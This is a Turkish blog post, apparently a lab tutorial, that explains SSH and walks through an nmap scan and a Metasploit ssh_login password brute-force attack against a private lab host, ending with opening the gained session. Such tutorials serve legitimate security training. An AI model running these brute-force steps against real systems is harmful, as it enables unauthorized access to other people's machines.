SSH Nedir? Güvenli veri iletimi için kriptografik ağ protokolüdür. Ssh ile ağa bağlı olan iki bilgisayar arasında veri aktarımı güvenli...

Secure Shell (SSH) | 22/tcp | Pentesting

9/24/2017 0 Yorumlar


ssh ile ilgili görsel sonucu

SSH Nedir?

Güvenli veri iletimi için kriptografik ağ protokolüdür. Ssh ile ağa bağlı olan iki bilgisayar arasında veri aktarımı güvenlik kanalı üzerinden güvensiz bir ağda yapılır. Bu durumda ağda Ssh ile haberleşen makinelerden biri ssh sunucusu diğeri ssh istemcisi olur. Bu protokol şartları SSH-1 ve SSH-2 olmak üzere iki önemli sürüm üzerinden birbirinden ayrılır.

"nmap -sV -p 3632 192.168.198.129" -> nmap -serviceVersion -p <taranacak_port> <hedef_ip> şeklinde yazdık.



############################################################################################

"search ssh_login" -> Metasploit içerisinden bu adın geçtiği exploiti bulmak için arama yaptık.

"use exp_name" -> use komutuyla exploit’i kullanacağız.

auxiliary(ssh_login)"show options" -> Sisteme yapılacak deneme yanılma (brute force) saldırısının sisteme erişmesi için gerekli ayarlamaların neler olduğunu öğrenmek için bu komutu kullandık.



############################################################################################

auxiliary(ssh_login)"set RHOSTS" -> Hedef ip giriyoruz
auxiliary(ssh_login)"set USERNAME msfadmin" -> İşlemi kısa tutmak namına kullanıcı adını girdim, siz USER_FILE ’ı kullanarak kullanıcı adı için de wordlist oluşturup atak yapabilirsiniz, kullanıcı adını doğru yapıp sadece şifre kısmı için b/f yaptıracağım.
auxiliary(ssh_login)"set STOP_ON_SUCCES true" -> Atıyorum: 6. satırdaki şifre eşleşti, 7. satırdaki şifreyi denemeye devam etsin mi? Eğer etmesin istiyorsak STOP_ON_SUCCES yani başarılı olduğu anda durdur seçeneğinin değerini true olarak ayarlıyoruz.
auxiliary(ssh_login)"set PASS_FILE dosya_yolu(/root/Desktop/pwdlist.txt)" -> Şifrelerin olduğu wordlist ’i ayarlıyoruz
auxiliary(ssh_login)"exploit/run" -> diyip atağı başlatıyoruz.



############################################################################################

[+] 192.168.136.128 succes: ’username:password’ --> Eşleşen şifre böyle gözükür.



############################################################################################

auxiliary(ssh_login)"sessions" -> Sistemde oturumun açılıp açılmadığını görmek için bu komutu kullanıyoruz.
auxiliary(ssh_login)"sessions -i 1" -> Sistemde açılan oturumun kimlik numarası (id) ’sini -i parametresiyle belirliyoruz, ardından oturum açılıyor, işlem bundan ibaret.



############################################################################################

0 yorum: